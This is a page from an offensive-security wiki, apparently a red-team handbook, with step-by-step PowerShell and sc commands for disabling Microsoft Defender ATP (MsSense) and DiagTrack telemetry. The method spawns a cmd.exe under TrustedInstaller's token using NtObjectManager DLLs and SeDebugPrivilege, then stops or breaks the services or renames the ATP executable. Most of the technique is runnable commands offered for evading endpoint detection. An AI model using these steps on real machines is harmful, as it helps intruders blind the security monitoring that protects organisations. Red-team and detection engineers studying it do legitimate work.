The Red Team Vade Mecum
  • The Red Team Vade Mecum
  • Techniques
    • Defense Evasion
      • Binary Properties and Code Signing
      • ATA/ATP
        • Important Note
        • Intro
        • Lateral Movement
        • Domain Dominance
        • Identification
        • Recon
        • Blocking/Disabling Telemetry
          • Trusted Installer
      • Tips and Tricks
      • Basics
        • IOCs
          • High Level Overview of EDR technologies
        • Sandbox Evasion
        • Obfuscating Imports
          • Bootstrapping
        • Encrypting Strings
      • Disabling/Patching Telemetry
        • ETW Bypasses
        • AMSI Bypasses
      • Minimization
        • Commands to Avoid
        • Pivoting
        • Benefits of Using APIs
        • Thread-less Payload Execution
        • DLL Hollowing
      • Misdirection
        • Command Line Argument Spoofing
        • PPID Spoofing via CreateProcess
        • Switching Parents
          • Dechaining via WMI
      • Hiding our Payloads
        • Event Logs
        • File metadata
        • Registry Keys
        • ADS
      • IPC For Evasion and Control
    • Privilege Escalation
      • Hunting For Passwords
      • To System
        • New Service
        • Named Pipe Impersonation
        • Local Exploits
        • AlwaysInstallElevated
      • Hijacking Execution
        • Environment Variable interception
        • DLL Hijacking
      • Insecure Permissions
        • Missing Services and Tasks
        • Misconfigured Registry Hives
        • Insecure Binary Path
        • Unquoted Service Paths
    • Enumeration
      • Situational Awareness
      • Recon Commands
        • .NET AD Enum commands
        • WMIC commands
          • WMI queries from c++
    • Execution
      • Cool ways of Calling a Process
      • One Liners
    • Initial Access
      • Tips and Tricks
      • Tools
      • Staging/Stagers
      • MS Office
        • Macros
          • Evasion
            • VBA Stomping
            • Revert To Legacy Warning in Excel
            • Sandbox Evasion
          • Info Extraction
          • Inline Shapes
          • .MAM Files
          • PowerPoint
          • ACCDE
          • Shellcode Execution
          • Info Extraction
          • Dechaining Macros
        • Field Abuse
        • DDE
      • Payload Delivery
      • File Formats
        • MSG
        • RTF
        • REG
        • BAT
        • MSI Files
        • IQY
        • CHM
        • LNK
          • Using LNK to Automatically Download Payloads
        • HTA
    • Lateral Movement
      • Linux
        • SSH Hijacking
        • RDP
        • Impacket
      • No Admin?
      • Checking for access
      • Poison Handler
      • WinRM
      • AT
      • PsExec
      • WMI
      • Service Control
      • DCOM
      • RDP
      • SCShell
    • Code Injection
      • Hooking
        • Detours
      • CreateRemoteThread
      • DLL Injection
      • APC Queue Code Injection
      • Early Bird Injection
    • Persistence
      • Scheduled Tasks
        • AT
      • MS Office
      • SQL
      • Admin Level
        • SSP
        • Services
        • Default File Extension
        • AppCert DLLs
        • Time Provider
        • Waitfor
        • WinLogon
        • Netsh Dlls
        • RDP Backdoors
        • AppInit Dlls
        • Port Monitor
        • WMI Event Subscriptions
      • User Level
        • LNK
        • Startup Folder
        • Junction folders
        • Registry Keys
        • Logon Scripts
        • Powershell Profiles
        • Screen Savers
  • Infrastructure
    • SQL
      • MS SQL
        • Basics
        • Finding Sql Servers
        • Privilege Escalation
        • Post Exploitation
  • Other
    • Vulnerability Discovery
      • Web Vulnerabilities
        • Code Grepping
          • PHP Cheatsheet
    • Windows Internals
      • Unorganized Notes
Powered by GitBook
On this page

Was this helpful?

  1. Techniques
  2. Defense Evasion
  3. ATA/ATP
  4. Blocking/Disabling Telemetry

Trusted Installer

PreviousBlocking/Disabling TelemetryNextTips and Tricks

Last updated 3 years ago

Was this helpful?

MsSense is a PPL service, meaning that even with SYSTEM privileges, we will not be able to stop this.

However Microsoft allows "trusted callers" to manage protected services and other critical resources in the system. This "trusted caller" is a service called TrustedInstaller.

You may have seen this certain service while looking at ACLs of certain applications:

As you can see, it is given full control of calc.exe, and is the only service that has full control.

It is also given full control over all the SVCHOST, which hosts the diagtrack service binary.

The TrustedInstaller service is also a service which does not have PPL configured:

So does that mean we can just change Trustedinstaller’s binary path to stop the ATP Sense service?

sc config TrustedInstaller binPath= "cmd /C sc stop sense" && sc start TrustedInstaller

Well, you can't, since this is already a known technique that ATP is aware of, and will make an alert if you try to do this.

Alright, so we know that TrustedInstaller is a service configured without PPL, we could potentially spawn a cmd prompt with DiagTrack as its parent(cmd will inherit the TrustedInstaller's security token descriptor), and use that cmd prompt to disable the ATP service that way.

Information of why this works is in this picture:

To do this, we need the SeDebug privilege(which you can enable if you are admin).

We will use PowerShell, and two .NET DLLs from James forshaw which will ease the whole process for us. These are called NtObjectManager.dll and NtApiDoNet.dll.

You can find these DLLs here:

These DLLs will not trigger any alerts due to the fact that they are legitimate windows code and are just wrappers around low-level code.

We will first load those 2 dlls in memory:

$a = [System.Reflection.Assembly]::Load($NtObject.dll)
$b = [System.Reflection.Assembly]::Load($NtApi.dll)

We will then import the loaded assemblies:

Import-module $a
Import-module $b

We will then enable the SeDebug privilege:

$token = Get-NtToken -Primary
$token.SetPrivilege([NtApiDotNet.TokenPrivilegeValue[]]"SeDebugPrivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled")

And then launch the TrustedInstaller process and get a handle to it:

start-service trustedinstaller
$handle = Get-NtProcess -Name "TrustedInstaller.exe"

We will then call the CreateProcess method to launch cmd.exe with TrustedInstaller.exe as its parent process.

$config = New-Object NtApiDotNet.Win32.Win32ProcessConfig
$config.CommandLine = "cmd"
$config.CreationFlags = [NtApiDotNet.Win32.CreateProcessFlags]16
$config.ParentProcess = $handle
[NtApiDotNet.Win32.Win32Process]::CreateProcess($config)

Then our CMD will popup!

From there, we can just stop the MsSense and Diagtrack service

C:\Windows\System32> Sc config diagtrack binpath="ploopy"
C:\Windows\System32> Sc stop diagtrack

Or just rename the executable:

rename "C:\Program Files\Windows Defender Advanced Thread Protection\SenseCncProxy.exe" blah 

This will effectively stop the ATP process.

GitHub - googleprojectzero/sandbox-attacksurface-analysis-tools: Set of tools to analyze Windows sandboxes for exposed attack surface.GitHub
Logo